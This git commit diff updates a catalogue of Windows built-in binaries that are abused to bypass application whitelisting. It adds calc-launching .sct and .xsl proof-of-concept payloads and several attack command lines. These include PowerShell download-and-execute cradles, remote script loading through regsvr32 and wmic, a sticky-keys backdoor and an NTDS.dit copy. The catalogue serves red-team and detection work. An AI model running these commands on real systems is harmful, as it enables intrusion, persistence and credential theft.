Added some more adjustments
parent
1a0eb4edc7
commit
610e5d7607
|
@ -11,8 +11,8 @@ Acknowledgements:
|
|||
|
||||
|
||||
Code sample:
|
||||
* [AllTheThingsX64.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)
|
||||
* [AllTheThingsX32.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx32.dll)
|
||||
* [AllTheThingsX64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
|
||||
* [AllTheThingsX32.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx32.dll)[1]
|
||||
|
||||
Resources:
|
||||
* https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
|
||||
|
@ -31,7 +31,7 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
|||
```
|
||||
|
||||
Notes:
|
||||
|
||||
[1]Code sample linked to Red Canary - Atomic Red Team
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -10,7 +10,7 @@ Acknowledgements:
|
|||
* ?
|
||||
|
||||
Code sample:
|
||||
* [NameOfLink](Payload/NameOfPayload)
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
||||
|
|
|
@ -0,0 +1,23 @@
|
|||
<?XML version="1.0"?>
|
||||
<scriptlet>
|
||||
<registration
|
||||
progid="PoC"
|
||||
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
|
||||
<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
|
||||
|
||||
<!-- .sct files when downloaded, are executed from a path like this -->
|
||||
<!-- Please Note, file extenstion does not matter -->
|
||||
<!-- Though, the name and extension are arbitary.. -->
|
||||
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
|
||||
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
|
||||
<!-- You can either execute locally, or from a url -->
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
// calc.exe should launch, this could be any arbitrary code.
|
||||
// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
|
||||
]]>
|
||||
</script>
|
||||
</registration>
|
||||
</scriptlet>
|
|
@ -0,0 +1,11 @@
|
|||
<?xml version='1.0'?>
|
||||
<stylesheet
|
||||
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
|
||||
xmlns:user="placeholder"
|
||||
version="1.0">
|
||||
<output method="text"/>
|
||||
<ms:script implements-prefix="user" language="JScript">
|
||||
<![CDATA[
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
]]> </ms:script>
|
||||
</stylesheet>
|
|
@ -3,14 +3,15 @@
|
|||
* Functions: Execute
|
||||
|
||||
```
|
||||
regasm.exe /U AllTheThings.dll
|
||||
regasm.exe /U AllTheThingsx64.dll
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Casey Smith - @subtee
|
||||
|
||||
Code sample:
|
||||
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
|
||||
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
|
||||
* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1]
|
||||
|
||||
Resources:
|
||||
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||
|
|
|
@ -3,10 +3,29 @@
|
|||
* Functions: Execute
|
||||
|
||||
```
|
||||
regsvcs.exe /U regsvcs.dll
|
||||
|
||||
regsvcs.exe regsvcs.dll
|
||||
regsvcs.exe AllTheThingsx64.dll
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Casey Smith - @subtee
|
||||
* Casey Smith - @subtee
|
||||
|
||||
Code sample:
|
||||
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
|
||||
* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1]
|
||||
|
||||
Resources:
|
||||
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
|
||||
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe
|
||||
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe
|
||||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
|
||||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
[1]Code sample linked to Red Canary - Atomic Red Team
|
|
@ -3,11 +3,33 @@
|
|||
* Functions: Execute
|
||||
|
||||
```
|
||||
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
|
||||
regsvr32.exe /s /u /i:file.sct scrobj.dll
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Casey Smith - @subtee
|
||||
|
||||
Code sample:
|
||||
* [Regsvr32_calc.sct](Payload/Regsvr32_calc.sct)[1]
|
||||
|
||||
Resources:
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md
|
||||
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
* https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Windows\System32\regsvr32.exe
|
||||
C:\Windows\SysWOW64\regsvr32.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
[1]Code sample linked to Red Canary - Atomic Red Team
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
@ -3,6 +3,8 @@
|
|||
* Functions: Execute
|
||||
|
||||
```
|
||||
rundll32.exe AllTheThingsx64,EntryPoint
|
||||
|
||||
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
|
||||
|
||||
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
|
||||
|
@ -37,6 +39,27 @@ Acknowledgements:
|
|||
* Jimmy - @bohops
|
||||
* Moriarty - @Moriarty_Meng
|
||||
* Adam - @hexacorn
|
||||
|
||||
|
||||
Code sample:
|
||||
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
|
||||
* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1]
|
||||
|
||||
Resources:
|
||||
* https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
|
||||
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
|
||||
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
|
||||
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Windows\System32\rundll32.exe
|
||||
C:\Windows\SysWOW64\rundll32.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
[1]Code sample linked to Red Canary - Atomic Red Team
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
@ -9,4 +9,22 @@ runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.tx
|
|||
Acknowledgements:
|
||||
* Matt Graeber - @mattifestation
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
||||
C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
@ -8,3 +8,21 @@ SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http
|
|||
|
||||
Acknowledgements:
|
||||
* Nick Landers - @monoxgas
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/monoxgas/status/895045566090010624
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Windows\System32\SyncAppvPublishingServer.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
Command injection into PowerShell
|
||||
Might have been fixed in newest version of Windows 10.
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -1,16 +1,56 @@
|
|||
## WMIC.exe
|
||||
|
||||
* Functions: Execute
|
||||
* Functions: Reconnaissance, Execute, Read ADS
|
||||
|
||||
```
|
||||
wmic process call create calc
|
||||
wmic process call create calc
|
||||
|
||||
wmic process get brief /format:"https://www.example.com/file.xsl
|
||||
|
||||
wmic os get /format:"MYXSLFILE.xsl"
|
||||
|
||||
wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
|
||||
wmic process call create '"c:\ads\file.txt:program.exe"'
|
||||
|
||||
wmic useraccount get /ALL
|
||||
|
||||
wmic process get caption,executablepath,commandline
|
||||
|
||||
wmic qfe get description,installedOn /format:csv
|
||||
|
||||
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
|
||||
|
||||
get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname"
|
||||
|
||||
wmic /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
|
||||
|
||||
wmic /NODE: "192.168.0.1" process call create "evil.exe"
|
||||
|
||||
wmic /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
|
||||
|
||||
wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
|
||||
|
||||
wmic process get brief /format:"https://www.example.com/file.xsl"
|
||||
|
||||
wmic os get /format:"MYXSLFILE.xsl"
|
||||
|
||||
wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Casey Smith - @subtee
|
||||
|
||||
Code sample:
|
||||
* [Wmic_calc.xsl](Payloads/Wmic_calc.xls)
|
||||
|
||||
Resources:
|
||||
* https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
|
||||
* https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
|
||||
* https://twitter.com/subTee/status/986234811944648707
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\wbem\wmic.exe
|
||||
c:\windows\sysWOW64\wbem\wmic.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -3,8 +3,28 @@
|
|||
* Functions: DLL hijack
|
||||
|
||||
```
|
||||
xwizard.exe (xwizard.dll in same folder)
|
||||
xwizard.exe
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Adam - @Hexacorn
|
||||
* Adam - @Hexacorn
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\xwizard.exe
|
||||
c:\windows\sysWOW32\xwizard.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
Need to copy out xwizard.exe to a user controlled folder.
|
||||
If you add your own version of xwizard.dll it will execute when you start xwizard.exe.
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue